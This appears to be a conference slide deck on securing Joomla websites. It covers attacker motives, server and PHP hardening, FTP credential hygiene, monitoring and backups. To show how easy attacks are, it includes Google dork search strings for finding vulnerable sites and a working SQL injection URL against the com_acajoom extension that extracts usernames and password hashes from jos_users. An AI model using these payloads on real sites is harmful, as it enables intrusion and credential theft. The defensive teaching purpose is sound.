Brendon Hatcher Joomla Security

JoomlaSecurityBare essentials to serious measuresBrendon HatcherTechnical DirectorPhoto: flickr.com/photos/carbonnyc

Understanding hackers and hackingDefinitions of “hacker”Hacker’s motivationsEvidence of hacking

What is a hacker?Someone who deliberately seeks to bypass a server’s securityBlack, grey, white hatsA hacked site is a broken/compromised siteA skilled computer programmerA hacked site is a tweaked and improved siteA script kiddieJunior hacker using otherhacker’s tools and techniques

Hacker’s motivationsTo see if they canTo create mayhemFor social standing in the sub-cultureFor political reasons – hacktivismFor financial reasonsTheft – steal ebooks, videos, games, online services etcSell data – user profiles, credit card details etcIndustrial sabotage - paid to break competitor sitesSet up zombie farmsSteal bandwidthHost phishing pagesCollect passwords

Evidence of hackingNone!Site trashedHacking messageHigh bandwidth useChanged admin passwordNew user with admin rightsServer logs

Why be concernedabout security?No-one is safe Hacking is actually quite easyFixing hacked sites is trickyHacked sites are a big problem

Why worry about hacking? Sites are targeted at randomHacking is actually quite easyVulnerable sites are easy to findVulnerable sites are easy to hackFixing hacked sites is quite trickyHacks can be invisibleClients may not notice a hacked site for some timeFinding a clean backup may be impossibleDetermining what has been done can be really hardMay be difficult to restoreHardening site to avoid future hacks requires skill and focus

Why worry about hacking? Hacked sites are a big problemBusiness reputationAngry clientsSite shutdown by hostLoss of businessData theftPhoto: flickr.com/photos/gaetanlee/

Hacking aJoomla siteIs Joomla less secure than other systems?The site must be vulnerable3 steps to hacking for fun and profit

Is Joomla less secure than other systems?Yes and NoJoomla has to strike a balance between security and ease of useJoomla an attractive target for hackersThe critical mass of sitesLarge amateur web developer user base Extensions have variable securityThe site must be vulnerable

3 steps to hacking for fun and profitFind a vulnerability (and instructions on how to exploit it)Find a vulnerable siteHack the siteThen, sit back and enjoy fame and fortune!

Find a vulnerabilitySecurity siteswww.exploit-db.com, www.secunia.comVarious hacking sites/forumsJoomlavulnerable extensions listdocs.joomla.org/Vulnerable_Extensions_List

Find a vulnerable siteGoogle Dork - a search phrase to find vulnerable sitesPHPInfointitle:phpinfo()Vulnerable extensionsallinurl:com_acajoom

Cut and paste hack codehttp://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*Photo: flickr.com/photos/tawheedmanzoor

Securityaction planWeb sites are like onionsLevels of securityWeb development toolsStrong, unique passwords everywhereContinuous attention

Web sites arelike onionsServer operating systemApachePHP + MySQLJoomla

Users and their behaviourLevels of security[1] Basic actions[2] More complex actions[3] Actions that require significant modification rights on the server (unless already implemented by default)Image by echiner1

Web development toolsWHM – server administrationcPanel – hosting account administrationFileZilla – FTP appKeepass – password vault

General adviceStrong, unique passwords everywhereA password vault removes the need to have a single, simple passwordContinuous attention needed

Creating a safehome for JoomlaShared, VPS or dedicated servers?ApachePHPMySQL

Shared, VPS or dedicated servers?A shared serverYour site(s) live in the same hosting space as other sites that you do not administerThis is the cheapest hosting option. No say over the security of the other sites on the serverOld shared server is the worst location for your hostingA Virtual Private ServerBetter than sharedStill can’t change many settings

Shared, VPS or dedicated servers?A dedicated serverStill a “shared” serverAllow you to upgrade and tweak all the settings on a dedicated serverHost retains responsibility for maintenance

Additional securitySuhosin – hardens PHPSamhain or TripwireConfigserver firewall

Apache[3] suExecCGI scripts run under the user of the website instead of the Apache user[3] Mod_securityIntrusion detection and prevention engine

PHP[2] PHP5, not PHP4[3] suPHPPHP files are run under the user of the website instead of the Apache userGlobally reset all filesOwner – AccountUsername:AccountUsernamechown -R user:group *Files – 644find . -type f -exec chmod 644 {} \;Folders – 755find . -type d -exec chmod 755 {} \;

Hosting account.htaccess files[1] Activate the htaccess file in the Joomla root[1] Use an .htpasswd for the /administrator/ folder[3] Advanced .htaccess filesA LOT more important detail in the manual

Keeping up to dateAvoiding the obviousHide, and be very, very quietSpam form submissionsInstall sh404SEFSecuring aJoomla site

Keeping up to dateMust update Joomla core and extensionsRemove unused extensions

Avoiding the obvious[1] The default database extension is jos_[1] The default admin username is admin[1] The default admin user ID is 62[1] Change administrator access URL

Hide, and be very, very quiet[1] SEF all URLs[1] Clear the default Joomlametatags[1] Clear the default Home page title[1] Remove generator tag[1] Change favicon[2] Hide component credits

Spam form submissionsTrying to inject spam content onto your siteTargets Joomla core forms and extension formsInstall a captcha system

Install sh404SEFSEF URLS hide from Google DorksFlood controlOther security settings

Creating a safe working environmentPC vulnerability to hacksFTP access hacksA note about users“Burglar bars, electric fences, alarms…and a key left under the doormat”

PC vulnerability to hacks[1] Install all operating system patches[1] Install all application system patches[1] Run comprehensive real-time protection apps[1] Install Secunia PSI[1] Secure your PC login[1] Secure your backup storage [2] Use a secure web browser

FTP access hacksIf a hacker can obtain your FTP password, they can login as you, bypassing almost every security barrier.FTP passwords are stored unencrypted in your FTP program! FTP authentication details pass unencrypted to the server!There are several common FTP apps that store their passwords in a standard location with a standard name!

FTP configuration[1] cPanel setupMake sure that the FTP password is strong[1] PC setupPassword vault (LastPass , Keepass ) to store the strong passwordMake sure passwords are not stored anywhere else (including on a Post-It note on the side of the PC)[1] FileZillaCopy all passwords to the password vault Delete all passwords from the Site ManagerSet FileZilla to run in Kiosk mode

FTP configuration[2] JoomlaRemove the FTP details from the configuration file[3] WHMDisable FTP access and allow only SFTP accessA note about usersYou should ideally create separate user accounts for each staff member

Preparing forthe worstSite monitoringA disaster recovery planJoomla site backupsRestoring a hacked site

Site monitoringDiagnosticsSite downHome page content changesMod_security logs (shows attempts)Bandwidth useSpam blacklisting[3] Searching and browsing server logs

Disaster Recovery PlanDepending on how central your web site is to your business, you may need a DRPSee Tom Canavan’s presentationhttp://www.slideshare.net/coffeegroup/tom-canavan-joomla-security-and-disaster-recoveryPhoto: flickr.com/photos/28481088@N00

Joomla site backupsLong-cycle Joomla backups are criticalRedundant backups lead to restful sleepSee my Joomla for Web Developer talk for MUCH more detail

Restoring a hacked siteFixes the obvious problems Does not address:Hidden hacksShell scriptsBackdoorsZombiesContinuing vulnerabilitiesImpacts of data exposurePhoto: flickr.com/photos/andreweason

Brendon Hatcher Joomla Security

More Related Content

Viewers also liked (14)

Similar to Brendon Hatcher Joomla Security (20)

More from Joomla Day South Africa (13)

Recently uploaded (20)

Brendon Hatcher Joomla Security

Editor's Notes